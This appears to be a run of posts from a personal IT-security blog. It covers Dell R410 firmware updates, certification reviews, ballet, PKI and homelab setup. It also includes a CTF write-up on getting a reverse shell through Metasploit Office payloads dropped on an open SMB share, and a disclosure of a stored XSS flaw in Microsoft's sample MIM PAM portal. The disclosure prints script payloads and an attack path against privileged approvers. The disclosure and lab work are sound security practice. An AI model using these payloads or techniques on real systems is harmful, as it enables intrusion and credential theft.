In the case of the R410, support options from Dell are slipping. While many homelabs (and some enterprises) still rock these now-aging servers, the vendor is slowly decreasing their active support.

In my homelab I have tackled only a small number of firmware updates and I'll quickly discuss the best/easiest way to tackle each. In some cases it took me days of trying to figure them out!

 

A note about Dell's Life Cycle Manager (LCM)

Dell's 11G systems (and later) include the Life Cycle Manager (LMC) which makes firmware updates a lot easier. You reboot your server into the USC (Unified System Configurator), launch the updater and pick the desired firmware updates.

Here's a demo on YouTube.

Unfortunately, the bad news is that somewhere in 2018 Dell dropped the 11G updates from their "catalogs". You can still use the following steps to make your 11G system check for updates, but it won't find any. You can check the catalogs yourself at https://ftp.dell.com/catalog/. Mind you, based on this forum thread, the Dell ftp/downloads site hasn't been without issues over the years.

  1. Boot your server and press F10 to launch System Services.
  2. In the menu, choose USC Settings (or whichever option lets you configure networking). By default USC will not retain its network configuration, or properly start the NIC, so you have to run this configuration each time.
  3. After configuring the network access, go back to the USC menu and choose to Launch the updater
  4. Apply the following settings:
    Server = ftp.dell.com
    Username =
    Password =
    Catalog path = /catalog/
    Proxy =
  5. If you now start the update process, the system will fetch and verify the catalog after which it will throw the following error.
"No update is available. Make sure that the Windows(R) catalog and Dell(TM) Update Packages for Windows(R) are used."

There are no more updates for 11G systems available for LCM.

 

A note about Dell Repository Manager

Technically it's possible to make your own internal clone of Dell's software update site. For a large enterprise, that's a great idea actually! Dell's recommended way of setting up a mirror to host updates for your specific systems, is to use the Repository Manager (DRM).

You could also use DRM to create a bootable USB stick that contains the updates you want, so the system can go and update itself, using LCM. Great stuff!

But you're still going to run into the same issue we discussed in the previous paragraph: 11G updates are no longer available through the catalogued repository. You can only get them from the Dell support site, as per below.

So for 11G, forget about DRM. For anything besides the iDRAC, you will need to boot an OS to update your firmware.

 

iDRAC6 update

Updating the iDRAC integrated management system (if you have it) is the easiest task, assuming that you have the full Enterprise kit with the web GUI. 

  1. Visit Dell's support site for your hardware, like here for the R410
  2. Download what is labeled as the latest "Dell iDRAC monolithic release".
  3. The downloaded file is a .exe self-extracting ZIP file. If you open this ZIP file, you will find a file with extension .d6 in there. 
  4. Visit your iDRAC6 web GUI and choose Update Firmware from the Quick Launch Tasks list. 
  5. Upload the .d6 file we extracted and let the iDRAC do its magic. 

 

Booting an OS to perform updates: BIOS and LCM

My R410 runs VMware ESXi which, while it's a Unix, is not supported to run Dell's firmware updates from. Dell support a plethora of Windows versions, a few other OSes and (for the 11G systems) RHEL 5 or 6 (Red Hat Enterprise Linux). 

I first wanted to try CentOS 6 (a RHEL 6 derivative), because that's an OS I'm quite comfortable with. I grabbed an ISO for CentOS 6 Live, used dd to chuck it onto a USB stick and booted the OS. Running the BIOS and LCM updates worked fine.

  1. On the Dell support site for R410, make sure to choose "Red Hat Enterprise Linux 6" as the target OS.
  2. Then grab the "Dell Server BIOS PowerEdge R410 Version 1.14.0" and "Dell Lifecycle Controller v1.7.5" downloads.
  3. You'll get a .BIN file, which is a shell script including binary content. Basically the Linux equivalent of a self-extracting ZIP. 
  4. Put these .BIN files on another USB stick, or download them using the browser on the CentOS live OS. 
  5. From a terminal, literally run the .BIN file as you would a shell script. It'll do what you need, or maybe throw an error or two that should be easily solved.

However, the BMC update proved to be quite a mess! In the .BIN package you'll find a rat's nest of shell scripts and binaries which have dependencies not available by default on the CentOS 6 live DVD (like procmail and a bunch of older C libraries). I tried fighting my way through all the errors, manually tweaking the code, but finally decided against it. There has to be an easier way!

 

Booting an OS to perform updates: BMC

Thanks to a forum thread at Dell, I learned that there is in fact an easier way. Instead of fighting with these odd Linux packages, let's go back to good ol' trusted DOS! 

FreeDOS that is!

I learned that booting FreeDOS from a USB stick on the R410 is problematic. In my case: it's a no-go. So I took FreeDOS 1.3 and burned their Live CD to a literal CD-ROM. Stuck that in the R410's DVD drive and it boots like a charm!

While FreeDOS does not have USB drivers, there is some magic in the underlying boot loaders that will mount any USB drives attached to the system during boot-time. The USB stick I put in the back USB port was made available to me as C:, while the booted CD-ROM was R:.

What do you put on that USB stick? The contents of the PER410*.exe files available from Dell's support site. Each of these is yet another self-extracting ZIP file, containing all the needed tools for the update. 

After removing the two iDRAC modules (read below) and getting the correct update (see below also), I followed the instructions from Dell's support team in that forum thread,  extracted the ZIP file onto the USB stick, booted FreeDOS and ran "bmcfwud". The system needed a reboot and a second run of bmcfwud. And presto! My BMC was updated!

 

A note about BMC and iDRAC

BMC stands for Baseboard Management Controller. It's Dell's integrated IPMI-based management system, which is literally integrated into the motherboard of the 11G systems. It'll let you do some basic remote management. The most important reason for homelab admins to consider updating BMC is to get version >=1.33 which greatly decreases fan noise

BMC was superceded by iDRAC (integrated Dell Remote Access Controller), which offers cool features like SSH access, a web GUI and much, much more features! Here's a short discussion about it.

For all intents and purposes iDRAC replaces BMC. If you have an iDRAC installed, the BMC will not be active on your 11G system. The fan noise issues on the R410 should be fixed with any recent version of the iDRAC firmware.

So why did I want to update the BMC firmware? 

Because I'm stubborn. =)

Initially, running the updater failed because it said my BMC was at version 2.92. Well, that's impossible!

Turns out, that's because I still had the iDRAC in there! :D I removed both iDRAC daughter cards and tried again. 

A downgrade? While I grabbed the most recent BMC update from Dell's site?! No thank you !

So, funny story: Dell's support site for the R410 states that the most recent available version for BMC's firmware is 1.15. The poweredgec.com site for 11G also confirms this. But if you manually search for them, you'll find newer versions:

Apparently my BMC already had 1.54, so it already had the fan updates from 1.33. Guess all the noise that thing was making was "normal". Anyway, grabbing the 1.70 update and running bmcfwud finally had the desired end result. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Ballet at La Bayadère in Almere

2020-01-09 20:42:00

I am very grateful towards my classmates and our teacher Lyda de Groodt, at ballet school La Bayadère in Almere (Facebook). They've always been awesome to our daughter, to my wife (when she still trained there) and now to me. 

As they say: "Don't judge a book by its cover". Sure, La Bayadère isn't a big brand-name corporation and no, they don't have some fancy modern studio. But they provide quality: personal guidance, a keen eye, discipline and of course a bit of fun! The students with whom I've trained want to learn proper ballet, but it's clear that we also do it for our own enjoyment. Today, I remarked to S. that "what I really love about this group, are all the smiles and laughs". Our group isn't just focused on rigorous dance, we also connect a bit on a personal level. 

I'm really happy to be training with people like T., Q., A. and I.: they never fail to make me feel like I'm twenty years younger again! ^_^

Ballet certainly is different from what you're used to seeing from me, after a sports hiatus of three years and four years of hard-hitting kendo. But I really, really enjoy it. Now that I think of it, it's funny that I haven't started writing about it earlier, seeing how voracious I was about kendo-blogging.


kilala.nl tags: , ,

View or add comments (curr. 0)

Finding study goals

2019-12-27 13:52:00

2020's right around the corner and I've been poking colleagues, urging them to set study-goals for the upcoming year. In Dutch, we have saying equating a lack of progress to deterioration: "Stilstand is de dood" ("Stagnation is death"). I believe that this proverb applies very heavily to work in IT: if you're not keeping up with the times, you're going to get out-dated real quickly. 

A colleague asked for suggestions on how to set goals for yourself, to which I replied:

I'd suggest taking into account things like A) where do you want to be in 2-3 years? B) is your team or company lacking particular knowledge or experience? C) do you, or your team, have requirements that you need to fulfill through training? D) do you see any chances that will allow you to quickly up your perceived value?

Basically: train for the job you want, fill any gaps that your team has and make sure you're not dropping any balls.

For me, EX407 fills categories B and C (my current team has little Ansible experience and it will renew my RHCE which will lapse in 1.5 years). The Python for pen-testing course will help me with A (I want to move towards red-teaming and my current coding skills are almost nill).

This year's CySA+ was for category D (it was heavily discounted and I'm pretty sure I could pass it, thus adding a well-regarded cert to my name). Ditto for trying the SANS Work/Study programme, which gets me a heavy discount on a very big-name training and cert.

Finally: just keep a list of things that you want to investigate or work on. Maintain it throughout the year, add new things, remove unwanted things, change priorities. That way you're always set for A) next year's study plans and B) that all-time favorite interview question "Where do you see yourself in two years? What are your short-term development plans?"


kilala.nl tags: , ,

View or add comments (curr. 0)

CompTIA CySA+ beta experience (CS1-002)

2019-12-09 12:53:00

Another day taken off from work for fun stuff! This time around I went in for yet another CompTIA beta exam, the new CS1-002 CySA+. Like before I sat the exam at my favorite testing center: IT Vitae in Amersfoort. The old Onze Lieve Vrouwe monastery and green surroundings make for a relaxing atmosphere! What was new this time, is that I sat the exam in tandem with my colleague D. She's great company, darn clever and she was looking to get back into the certification-game.

First up, let me point you at a great review of the CS1-002 beta exam, by u/blackvapt on Reddit. And here's the official thread on Reddit, inviting people to take part in the beta.

I will echo everything /u/blackvapt said. The new CySA+ exam is in fact good! The questions are in-depth and technical, without overly focusing on commandline options and flags. In that regard it matches my experience with the PenTest+ exam in 2018: the exam tests for insight and experience in the field of incident response. It's not something you can simply cram books for, you'll need to have experienced many of the situations discussed on the test. The thing is: it's nigh impossible to learn every log format and every OS out there, but if you can intuit the meaning of logs and commands based on your experience, you'll go a long way!

The PBQs (performance based questions) were great! I enjoyed most of them and thought them to be actually fun and a nice multi-layered puzzle. So much better than my experience with the Linux+ exam which only managed to frustrate me with its strict and limited PBQs. 

Preparation-wise I'll admit that I took it easy. I was relying mostly on A) my experience from the past 5-10 years, B) the Jason Dion practice exams for CS1-001 on Udemy and C) the Chapple & Seidl book from Sybase. I spent about twenty hours reviewing and researching, over a month's time.

I didn't spend more than $25 on the preparations, as the practice exams were on discount down to $10 and I got the C&S book through Humble Bundle in a large stack of awesome Sybex books. One note about Humble Bundle: I cannot recommend the Packt books or bundles! Skip those. But snag anything you can get from Sybex, NoStarch or O'Reilly!

Regarding the Dion practice tests: I was not passing any of these while preparing as I mentioned earlier this week. It was odd because I felt good on most of the answers I gave to Jason's questions, but I kept missing the passing grade by a fair margin. During the beta exam I felt great about ~85% of the questions, so it's really a crap-shoot on whether I passed the beta or not. :)

If I didn't pass, I wouldn't mind at all! This was a great exam, with solid challenging questions. If I don't make it, I will definitely take the exam again (at full price), now know what to expect.


kilala.nl tags: , ,

View or add comments (curr. 0)

Almost time for another Beta exam: CompTIA CySA+

2019-12-05 09:31:00

I've got my exam planned for Monday and I'm looking forward to it. I'll mostly treat it as a recon mission, doing it part for fun and part to see if I'd like to take the exam "for real" should I not pass.

I've got a sneaking suspicion I won't pass this time around though (unlike the Linux+, Pentest+ and CFR-310 betas) because my experience keeps tripping me up. Sounds like a #HumbleBrag, I know, sorry :D What I mean is that CompTIA mostly seems targeted at US-based SMB, while my experience comes from EU-based international enterprises. I've been doing a few of Jason Dion's test-exams for the previous version, to get into the right mindset, but I fail a lot of questions because of the aforementioned factors.

Well, let's see how it turns out. For now, I'll just go and have fun with it :)


kilala.nl tags: , ,

View or add comments (curr. 0)

"If it were easy, I wouldn't be doing this"

2019-11-18 20:59:00

bob ross

... That's what I told my classmate B. (their ballet blog is here) tonight: "if it were easy, I wouldn't be doing this." That's what I honestly believe: I often do things because they're a challenge. Hence why I kind of live by Bob Ross' quote shown to the left.

Or as Nobel laureate Craig Mello put it: "Ask yourself: “are you having fun?”. And sometimes it’s not fun, but there’s something at the back of your mind maybe saying: “if I can just figure this out”, you know? And when you do, finally do make sense of that thing, man! It’s so much better because it was hard!"

So, what are B., our classmates and myself learning?

Ballet.

I am learning ballet and have been for a few months now. I'm an uncoordinated ditz, struggling with basics, but I'm loving it even when I'm hating it. The hating is short and momentary, the loving is something that sticks. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

In many cases, just cramming for an exam won't work

2019-11-18 20:44:00

Today, someone on Reddit posted the following question

"I have the [...] practice exams, I typed the entire [...] video course from YouTube and I just brought the exam cram book but no matter how much I study I don’t retain anything. Do you guys have tips?"

OP ran into the wall that is learning styles: cramming simply doesn't work for everybody! I'm no expert by any means, but I did explain the following:

It is entirely possible that your current method simply does not suit your personal learning style! If you start poking around the web a little bit, researching learning styles, you will find very quickly that there are many different methods!

You can try and keep brute-forcing your learning the way you have right now, but maybe that will simply not get the results you want. Why not have a think about your days in primary, middle and high school? What did the classes you did best in have in common?

Perhaps you're someone who simply needs something else than quiet self-study, taking notes while listening to a teacher.

Personally I have found that I put great importance on putting new information into context. I don't want to learn floating, individual topics, I want to put them into a context that I'm already familiar with, or build a context around them. This helps me better understand the new material's place. One thing that could help you with this is making mind maps.

Or perhaps you're someone who better learns by doing then by hearing. I understand that playing around with new tools and concepts in a lab can take a lot of time, but there's a reason why many books include lab exercises for the reader. It is often said that people learn <20% by hearing and >50% by doing.

Finally, it is also often said that one way to solidify and test your understanding of a subject, is to explain the topic to somebody else. If you can explain X or Y to a friend, your partner or a rubber ducky, then you can be sure that you've come to a proper understanding. Or perhaps you will find a few gaps in your knowledge that you need to fill out. Either way, it's a win-win.

 


kilala.nl tags: ,

View or add comments (curr. 0)

Zine: "The tale of the Dubious Crypto", a pentesting adventure

2019-11-08 16:15:00

A broken padlock

If you've met me IRL, you will most likely have seen me doodling or drawing. It's an almost compulsory thing for me! I've often said that drawing is like my brain's "Idle Process", running in the background making sure I pay attention to things around me, like meetings or phone calls.

Over the past 30+ years I've mostly drawn for my own enjoyment, though I've also published yonkoma comics about my daily life and even tried my hand at a short story or two. In 2019 things took a new turn after b0rk (Julia) and SailorHG (Amy) inspired me to make a "zine".

To sum it up, a "zine" (short for magazine) is a self-published booklet about subject matter that's dear to the author's heart. The Public have a made a wonderful zine explaining zines (how meta!), which is available here: An Introduction To Zines.

For starters, I'll write about things I've learned during my work and studies which I feel are well-worth sharing with others. The first issue, "The tale of the Dubious Crypto" covers Windows security practices and bad cryptography implementations in a piece of software I pen-tested.

You can find all upcoming releases, including printing instructions and license information, over here -> https://github.com/tsluyter/Zines


kilala.nl tags: , ,

View or add comments (curr. 0)

PenTester Academy CRTP exam

2019-10-22 14:24:00

Ooooffff... What a night. What a day. I'm beat :)

It's hard to believe that my OSCP examination took place 2.5 years ago. It feels much more recent! Or maybe that's wishful thinking...

Anywho, over the past twentyfour hours I repeated the experience by taking part in PenTester Academy's CRTP exam: Certified Red Team Professional. It's the closure piece to their "Attacking & Defending AD" online training

I'm gonna say that this exam is absolutely not a red-teaming exercise (per Deviant Olam). RT would include attacks on both the physical space, human employees and on IT resources. And this exam squarely focuses on IT only. So the "RT" in "CRTP" is badly chosen, but alright. Let's put it down as marketing.

So! There are a few reviews out there about the CRTP (like Truneski's, or this thread on TechExams, and Spentera's), but as always I'm going to quickly recap my own experiences.

To get the obvious question out of the way: was it worth it? I got in at the introductory price of $550 for 90 days (normally $600) and either way I'd say "Heck yes!". Fourteen hours of video material and a well-built lab environment to hack Active Directory made it well worth it! 

Nikhil's videos are well-made and are perfect for playing at 1.3x or 1.5x speed.  The slide deck and lab guides are certainly good enough as well. 

It's great how the training explains multiple ways to achieve the same goal, though at times it became hard to tell them apart :D That's mostly a failing of my own though. It has become very much apparent that I need to go back and review these materials a few times before fully grasping these AD attacks. Luckily there are many great resources, like the harmj0y, adsecurity and Specter Ops blogs.

Excluding the exam, I spent roughly sixty (60) hours on the videos, labs and research. That's a lot of CPE for my CISSP, CEH and CompTIA certs!

The exam! Ooohhh, I loved it! It's like OSCP, where you're given a twentyfour hour window to attack and pwn a number of target systems. But where OSCP offers X amount of disparate hosts, CRTP has them tied together in an Active Directory environment. You're not attacking software on its vulnerabilities, no you're attacking an environment based on misconfigurations in AD or Windows!

Like ChrisOne in the TechExams thread I ran into a wall which would last me well over six hours. Here's a rough timeline (it's no secret that there are five target hosts, so I feel it's safe to describe the timeline):

You will notice that things moved really fast once I got onto the second target host. That's because my enumeration of the domain objects had provided me with a clear path of attack to move from the second through to the fourth one. The fifth one was pretty cut and dry from there on out, but it required more manual labour. 

Getting privesc on my workstation only took so long because I didn't want to outright get started with that. :) I first wanted to put as much time as possible into properly enumerating the domain.

By 2230, exactly twelve hours after the start of my exam, was I done with the attacks. I'd gathered notes and lots of evidence while attacking, so all that remained was writing the report. That's where things took a turn for the nostalgic: it played out like my OSCP exam! I wanted to take a nap before writing the report, but really could not get to sleep. So by 0030 I was up and writing again! And finally, five hours later at 0530, I submitted roughly 36 pages of report to PTA.

Fingers crossed! I'm hoping for good news!


kilala.nl tags: , ,

View or add comments (curr. 3)

Ooofff, what a week (yes, still alive)

2019-10-04 20:01:00

And to think that I used to be such a diligent blogger! Weekly, or even daily updates! And now I've been quiet for almost three months?! Either, I've got nothing going on in my life, or way too much! :p Hint: it's the latter.

This week has been awesome!

I snagged my first official CVE, an XSS in Micro Focus Enterprise Server. I'd been sitting on that one for a few months now, so I can finally gloat a little bit :)

===

Last night was PvIB's annual CTF. Lemme tell you, it was a lot harder than in the previous years! I only managed to grab one of the "easy" flags. I learned a few cool new things though that I hadn't done before.

Most importantly: using Wireshark to decrypt TLS traffic in a PCAP. I had assumed that you would need the server's private key to do so, which turned out to be correct :) In this case the traffic had been encrypted with a private key which a malware creator had accidentally leaked. Had I Googled the subject's name on the certificate earlier, then I'd have found the private key much sooner as well ;)

===

Speaking of challenges: I took ${CLIENT}'s internal secure programming training for DevOps engineers this week. The training's a bit rough around the edges, but it covers a lot of important stuff for folks building web apps. I'm pretty impressed and also a bit daunted about teaching it in a few weeks. 

I'm now horribly aware that my webdev experience is 15 years old and antiquated. I've never even done much Javascript, let alone Flask, Angular, Jinja, and so on. So that's a challenge.

I took the exam for the course today: it was great! Like a mini OSCP where you're given a webapp with 15+ known vulnerabilities (ranging from CSRF, through XXE and SSTI through broken deserialization and JWT tokens). Lost of those things I'd not heard of yet! 

Anyway: you have nine hours! Find all the vulns, exploit them, suggest fixes and remedies and then report it all correctly. Nine hours?! That was a slog, even having full white-box access to the Docker container and all the sources.


kilala.nl tags: ,

View or add comments (curr. 0)

Yes, I'm still here! Just very busy

2019-07-31 21:48:00

It's been three months since I last posted publicly. Don't worry, I'm still here :) I just have a lot of things going on.

In our private life lots of things are also going on, but I'll leave those for another time and place.


kilala.nl tags: ,

View or add comments (curr. 1)

CTF036 2019, the Secured By Design CTF

2019-04-05 09:10:00

Me, on stage

The photograph on the left was provided by Secured By Design.

I love CTFs and though I can't take part in a lot of them, I make it a point to always play in Secured By Design's CTF036. Four years in a row now and the events just keep getting better! 

I was invited to give a small talk again, this time covering the basics of PKI: public key infrastructure. In short, PKI is one of the ways to solve the challenge of "trust" in an environment: how can you trust that someone or something really is whom they claim to be? We were very much cramped for time, so I had to try and smush everything into half an hour! While the talk went smoothly, I'm not entirely happy: there was just too much info in too little time. And I didn't even cover it all! 

My slide deck for "When Alice met Bob..." is over here. 

The CTF itself was, as always, a blast! Roughly a hundred participants, attacking six copies of the same target environment: three servers and two desktop systems, part of a fake school's infrastructure. Our goal was to grab as many student IDs as possible. 

The usual suspects were there yet again: weak passwords on mailboxes, SMB shares without proper ACLs, simulated end-users and a rudimentary daemon which you could try a buffer overflow on.

I spent most of my time on attacking one of the end users: a professor. The school's website featured an open forum, with sections dedicated to each of the classes taught. One professor warned his students that their final presentations were due any day now and that they should be submitted "through the usual share". This refers to the aforementioned, open SMB share which had a subfolder "Presentations". 

I recalled that SETookit and Metasploit offered options to create Word/Powerpoint/Office payloads, but had forgotten how to. I'm rusty, it's been a while since I've done this :) After a bit of research, I turned to exploit/windows/fileformat/office_OLE*. When configuring the exploit I simply chose to target all possible options, which generated roughly twenty files with shellcode. In real life this would obviously not work, because who would fall for that?! Twenty files without content, clicking through all of them? Nope :) But in this case the script set up on the workstation (to simulate the professor) was greedy and simply went through all of them. 

Using this method I got a nice and shell_reverse_tcp to my port 443. Looking to escalate my privileges on the workstation I tried to get a Meterpreter payload to run in the same way, but failed. I guess the payload was too tricky for the target. 

I explained this particular attack vector to two teams (ex-colleagues to my right, the team in #1 slot to my left), which was a fun exercise. I love explaining stuff like this to people who're just getting their feet wet (my ex-colleagues). The #1 team quickly latched onto the idea and offered an improvement to the attack: use the reverse shell to download a Meterpreter payload .EXE file. Duh! I should've thought of that! 

Anyway: a wonderful day with fun hacking and meeting cool people! Heartily recommended :)


kilala.nl tags: , ,

View or add comments (curr. 1)

PKI: using a private versus a public ca

2019-04-05 06:17:00

This morning an interesting question passed through the SANS Advisory Board mailing list:

"Looking for anyone that has done a cost benefit analysis, or just general consideration, of using a Public CA vs. a Private CA for a PKI deployment. Some vendors are becoming very competitive in this space and the arguments are all one-sided. So aside from cost, I’m looking for potential pitfalls using a public CA might create down the road."

My reply:

My previous assignment started out with building a PKI from scratch. I’d never done this before, so the customer took a gamble on me. I’m very grateful that they did, I learned a huge amount of cool stuff and the final setup turned out pretty nicely! I’ll try and tackle this in four categories.

UPSIDES OF PRIVATE PKI

 

UPSIDES OF PUBLIC PKI

 

DOWNSIDES OF PRIVATE PKI

 

DOWNSIDES OF PUBLIC PKI

If your infrastructure needs to be cut off from the outside world, you will HAVE to run your own, private PKI. 

I’ve recently presented on the basics of PKI and on building your own PKI, be it for fun, for testing or production use. The most important take-away was: “If you’re going to do it, do it right!”. You do NOT simply fire up a Linux box with OpenSSL, or a single instance Windows Server box with ADCS and that’s that. If you’re going to do it right, you will define policy documents, processes and work instructions that are to be strictly followed, you’ll consider HA and DR and you’ll include HSMs (Hardware Security Modules). The latter are awesomely cool tech to work with, but they can get pricy depending on your wants and needs. 

Remember: PKI might be cool tech, but the point of it all is TRUST. And if trust is damaged, your whole infrastructure can go tits-up. 


kilala.nl tags: , , ,

View or add comments (curr. 0)

Solved: Citrix Receiver - Cannot create connection file CitrixID

2019-03-24 14:12:00

Error message and creation

Earlier this week I had a need to use Citrix Receiver on MacOS, to connect to a remote desktop environment. That's a pretty normal use-case :) Unfortunately it kept throwing me an error: "Cannot create connection file CitrixID". 

Looking around the web it seems that plenty of people run into this issue, with plenty of hokey "fixes" going around. None of them got to the root of the issue. But here you are: the root cause!

When installing Citrix Receiver, the installation script uses your admin-rights to run a few commands using the actual root-account. Kind of yucky, but not very abnormal. The problem is that the scripts also creates configuration directories in your personal homedirectory. For example in "/Users/tess/Library/Application Support/Citrix Receiver". As you can see from the screenshot above, these directories and files are assigned root ownership, meaning that your normal user account cannot access or overwrite these files. 

The solution consists of either A) changing the ownership to your account and group, or B) just hard-removing these directories and re-creating them. Option A is neater and either requires use of the Terminal (sudo chown -R tess:tess "/Users/tess/Library/Application Support/Citrix Receiver"), or you can try with with the Info-view of the directory and changing the permissions from there. 


kilala.nl tags: ,

View or add comments (curr. 0)

Adding your own, trusted CA certificates in RedHat and Debian derivatives

2019-03-12 20:02:00

The past week I've gotten my start in an Ansible course and a book, starting my work towards RedHat's EX407 Ansible exam. I've been wanting to get a start in Ansible, after learning a lot about Puppet a few years back. And if I manage to pass EX407 it'll renew my previous RedHat certs, which is great. 

Anywho! The online course has its own lab environment, but I'm also applying all that I learn to my homelab. So far Ansible managed the NTP settings, local breakglass accounts and some systems hardening. Next stop was to ensure that my internal PKI's certificates get added to the trust stores of my Linux hosts. I've done this before on RedHat derivatives (CentOS, Fedora, etc), but hadn't done the trick on Debian-alikes (Ubuntu, Kali, etc) yet. 

First stop, this great blog post by Confirm IT Solutions. They've provided an example Ansible playbook for doing exactly what I want to do. :) I've taken their example and I'm now refactoring it into an Ansible role, which will also work for Kali (which unfortunately has unwieldy ansible_os_family and ansible_distribution values).

To summarize the differences between the two distributions:

RedHat expects:

Debian expects:


kilala.nl tags: , ,

View or add comments (curr. 2)

IT testlabs (homelabs) for everyone

2019-03-02 07:29:00

This article was posted to my LinkedIn, here.

Not too long ago I was in a SANS course, about the Critical Security Controls. More than once our teacher Russell nudged us, suggesting that "you could be applying these to your home network as well!" which brought us to the subject of testlabs. "What would make a good testlab for us?" was something asked along the way.

To sum things up: it really doesn't have to be glamorous! As long as your lab helps you experiment and learn, it's a good lab for your! So here's a few quick reminders for IT folks who would like to get their feet wet in setting up their own labs. 

Many homelabs have humble beginnings: if you have some spare room on your PC or laptop, you're good to go! If you throw the free and open source VirtualBox software on there, you can get started running a small number of VMs right away. Want something more polished? Take a look at VMWare's or Parallel's offerings! Both offer prosumer solutions for the private environment, that allow you to run a few VMs without incurring too much costs. And if you're already running Linux, there's always the fan-favorites KVM and Qemu.

So what do you put into that shiny, new lab of yours? Well, whatever you like of course! 

If there's a course or exam you're studying for, run the relevant software in your lab. Tinker with it. Mess with it. Break it and fix it. Then do some unexpected funny business with it. Enjoy yourself! 

Need to learn new software for work? Want to try a new programming language? Feeling nostalgic and want to run those old games from yesteryear? Throw it into your lab!

Then after a few years, you may start feeling cramped. There's only so many VMs you can run in the spare space of your day-to-day computer. What to do? What to do?! You can't exactly go out and buy some expensive, enterprise-grade hardware, can you? ... Or, could you? ;)

This is when you turn to resources like OpenHomeLab and /r/homelab. There are many ways of getting performant virtualization platforms for relatively little money. For example, if you feel spendy you could put together your own server hardware from a source like SuperMicro, or buy a new Intel NUC. The latter are tiny powerhouses that can be easily tucked away and which don't make a lot of noise (spouse-friendly!). 

Want to be more frugal? Turn to one of the many hardware refurbishing companies in your area. Their whole purpose is to buy older enterprise equipment, clean it up and resell it to second-hand buyers. Do your research and you'll find some really great stuff out there.

With your newfound enterprise hardware it's also time to move to enterprise-level virtualization! Huzzah! New things to learn! And there are so many great choices! Windows Server comes with Hyper-V. Linux comes with KVM and Qemu. And there's always the tried-and-true (and FREE!) VMWare ESXi. Or if you're feeling daring, take a look at the awesome ProxMox

To illustrate the aforementioned, here's my own story:

To sum things up: just get stuck in! Start small and keep learning!


kilala.nl tags: ,

View or add comments (curr. 0)

Network segmentation in the homelab

2019-03-01 22:36:00

My network layout

Continuing where I left off a few weeks ago, I've redone the network design for my homelab. When we last looked at the network, it was all flat with all VMs tucked in a single subnet behind a pfSense router. Because I want to work towards implementing the CSC in my lab, I've moved everything about quite a lot.


kilala.nl tags: , ,

View or add comments (curr. 0)

GCCC certification achieved

2019-02-28 14:39:00

It's been two weeks since finishing my index of the SEC566 course materials. This morning, I took the GCCC certification exam and passed with a 93% score! Yay!

On to the next big thing: RedHat's EX407 Ansible exam :)


kilala.nl tags: ,

View or add comments (curr. 2)

Be a good netizen: enable SPF to prevent email spoofing for your domain

2019-02-25 09:57:00

Continuing with security improvements all site and domain admins can apply: everybody that runs their own domain can and should implement SPF: Sender Policy Framework.

What it does, is explicitly tell the whole Internet which email servers are allowed to send email on behalf of your domain(s). Like many similar advertisements, this is achieved through DNS records. You can handcraft one, but if things get a bit too complicated, you can also use the handy-dandy SPF Wizard.


kilala.nl tags: , ,

View or add comments (curr. 0)

GIAC GCCC index and studying

2019-02-18 20:29:00

a stack of books

Ooofff!! I've spent the past three weeks building my personal index for the SANS SEC566 course books. It was quite a slog because the books are monotonous (twenty chapters with the exact same layout and structure), but I've made it through! 29 pages with 2030 keywords.

The index was built using the tried and true method made famous by Hacks4Pancakes and other InfoSec veterans.

Right after finishing the index I took my first practice exam and scored a 90%. That's a good start!


kilala.nl tags: , ,

View or add comments (curr. 2)

Microsoft MIM PAM Portal and PAM REST API cross-site vulnerability

2019-02-07 18:11:00

 

If the screenshot above looks familiar to you, you need to pay attention. (Image source)

 

XSS attack on Microsoft's PAM Portal

Microsoft's MIM is a widely used identity management platform for corporate environments. Many MIM tutorials, guides and books (including Microsoft's own site) [1][2][3] refer to Microsoft's sample PAM portal [4] to demonstrate how a request handling frontend could work. In this context, PAM stands for: "Privileged Access Management". While some of these sources make it clear that this is merely a demonstration, I can say without a doubt that there are companies that put this sample PAM portal to use in production environments. [5][6][7][8] Let me restate: there are enterprises putting the sample PAM Portal into production!

In short, the PAM portal allows an authenticated user to activate MIM "roles", which in turn will add groups to their account on-demand. By activating a role, MIM interacts with Active Directory and adds the groups configured for the role, to the end user's account. Unfortunately the sample PAM portal is not suited for production and I suspect that it has had little scrutiny with regards to the OWASP Top 10 vulnerabilities.

The cross-site scripting vulnerability that I ran into concerns the "Justification" field shown in the screenshot below. (Image source)

When activating a role, the end-user is presented with a popup asking for details of the request. The field labeled "justification" allows free entry of any text. It is not sanitized and the length appears to be limited to 400 characters. Through testing I have proven the ability to enter values such as:

<script>alert("Hello there, this is a popup.");</script>
<script>alert(document.cookie);</script>

 

These Javascript snippets are entered into the backend database without sanitation or conversion. The aforementioned 400 characters limit is easily enough for instructions to download and run shell code.

If we look at "Roles.js" on the Github page we see the following, where the form contents are loaded directly into a variable, without sanitation.

  $("form#createRequestForm").submit(function(e){
        var roleId = $("#roleIdInput").attr("value"); 
        var justification = $("#justificationInput").val();
        ... ...
        $.when(createPamRequest(justification,roleId,reqTTL,reqTime))
        ... ...

The "createPamRequest" function is defined in "pamRestApi.js", where yet again the input is not sanitized.

function createPamRequest(reqJustification, reqRoleId, reqTTL, reqTime) {
    var requestJson = { Justification: reqJustification, RoleId: reqRoleId, RequestedTTL: reqTTL, RequestedTime : reqTime };
    return $.ajax({
        url: BuildPamRestApiUrl('pamrequests'),
        type: 'POST',
        data: requestJson,
        xhrFields: {
            withCredentials: true
        }
    })
}

The XSS comes into play when browsing to the "Requests" (History) or the "Approvals" tabs of the sample PAM portal. These pages respectively show the user's own history of (de)activation and other user's requests that are pending approval. After entering the code snippets above, visiting the "History" tab results in two popups: one with the short message and another one blank, as there are no cookie contents.

 

Attack vectors

One viable attack vector would be:

  1. Attacker has access to a valid Active Directory account (either stolen or their own account).
  2. Attacker requests access to a role that requires approval from a privileged administrator.
  3. As justification, attacker enters Javascript or similar programming that includes shellcode.
  4. Privileged administrator visits the "Approvals" tab and the shellcode is run on their computer, using their privileges.
  5. The attacker has now gained access to the privileged administrator's computer with their credentials.

 

Root Cause for the cross-site scripting: MIM PAM REST API

The aforementioned sample PAM portal is a collection of Javascript bundles and functions, thrown together with some CSS and HTML. It has no database of its own, nor any data of its own. All of the contents are gathered from the MIM (Microsoft Identity Manager) database, through the MIM JSON REST API.

Based on the previously discussed vulnerability we can conclude that the MIM JSON REST API does not perform input validation or sanitation! At the very least not on the "Justification" field. The Javascript code I entered into the form was passed directly through the JSON API into the MIM database and was later pulled back from it (for the "Requests" and "Approvals" pages).

I have also verified this by delving directly into the database using SQL Management Studio. The relevant field in the database literally contains the user's input. There is no transcoding, no sanitation, etc.

 

Resolution by Microsoft

